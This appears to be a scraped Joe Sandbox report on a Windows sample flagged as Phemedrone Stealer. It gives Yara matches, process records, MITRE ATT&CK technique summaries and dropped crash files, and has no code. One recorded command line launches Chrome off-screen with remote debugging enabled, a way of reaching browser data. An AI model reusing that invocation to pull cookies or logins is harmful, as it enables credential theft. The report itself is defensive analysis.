Yara matches:	Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000001.00000002.1584357920.0000000003868000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000001.00000002.1584357920.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000001.00000002.1586631205.00000000136D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000001.00000002.1584357920.00000000034E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000001.00000002.1584357920.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:11:16
Start date:	11/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff61e340000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:11:20
Start date:	11/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2108 /prefetch:3
Imagebase:	0x7ff61e340000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:11:23
Start date:	11/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2040,i,4433649771088755692,3675350888853428571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4856 /prefetch:8
Imagebase:	0x7ff61e340000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:11:39
Start date:	11/03/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7924 -s 2604
Imagebase:	0x7ff75d8c0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report R9rwNLVzpr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Phemedrone Stealer

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_R9rwNLVzpr.exe_7c2b2a7146f988ee3bcf888ea78159f2dbd1c15_635628c3_d6139913-86aa-40fd-a825-c6436ad5351d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1224.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER12A2.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF92.tmp.dmp

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
R9rwNLVzpr.exe